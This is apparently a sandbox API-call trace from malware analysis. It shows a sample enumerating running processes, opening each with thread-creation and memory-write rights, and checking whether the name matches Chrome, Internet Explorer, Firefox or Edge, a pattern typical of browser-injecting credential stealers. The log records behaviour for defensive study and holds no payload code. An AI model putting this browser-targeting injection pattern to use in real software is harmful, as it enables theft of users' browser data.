	[0246.719] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x9670
	[0246.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.719] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.720] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.720] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.720] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.721] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.721] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x9674
	[0246.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.721] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.722] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.722] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.722] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.723] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.723] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x9678
	[0246.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.724] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.724] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.724] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.724] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.725] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.725] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x967c
	[0246.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.726] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.726] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.726] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.727] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.727] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.728] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x9680
	[0246.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.728] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.728] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.728] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.729] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.729] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0246.730] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x9684
	[0246.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.730] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0246.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.731] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.732] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0246.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.732] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.732] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.733] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x9688
	[0246.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.733] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.734] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.734] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.734] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.734] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0246.735] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x968c
	[0246.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.735] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.736] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.736] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.736] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.736] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0246.737] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x9690
	[0246.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.737] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0246.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.738] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.738] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0246.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.738] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.739] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.739] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x9694
	[0246.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.739] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.740] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.740] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.740] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.741] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0246.741] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x9698
	[0246.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.742] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0246.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.742] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.742] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0246.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.743] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.743] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0246.744] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x969c
	[0246.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.744] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0246.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.744] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.744] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0246.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.745] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.745] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0246.746] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x96a0
	[0246.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.746] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0246.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.747] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.747] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0246.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.747] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.747] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0246.748] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x96a4
	[0246.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.748] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0246.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.749] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.749] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0246.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.749] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.749] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0246.750] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0246.750] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0246.751] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x96a8
	[0246.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.751] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0246.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.752] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.752] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0246.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.753] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.753] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0246.754] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x96ac
	[0246.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.754] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0246.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.755] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.755] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0246.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.755] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.755] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0246.756] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x96b0
	[0246.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.756] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0246.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.757] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.757] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0246.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.757] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.757] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0246.758] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x96b4
	[0246.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.758] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0246.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.759] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.759] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0246.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.759] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.760] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0246.761] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x96b8
	[0246.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.761] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0246.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.762] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.762] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0246.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.763] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.763] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0246.764] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x96bc
	[0246.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.764] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0246.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.764] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.764] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0246.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.765] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.765] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0246.766] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x96c0
	[0246.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.766] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0246.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.766] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.767] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0246.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.767] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.768] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0246.769] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x96c4
	[0246.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.769] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0246.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.769] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.770] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0246.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.770] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.770] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0246.771] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x96c8
	[0246.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.771] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0246.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.772] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.772] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0246.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.772] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.772] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0246.773] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x96cc
	[0246.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.773] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0246.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.773] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.774] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0246.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.774] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.774] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0246.775] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x96d0
	[0246.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.775] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0246.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.776] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
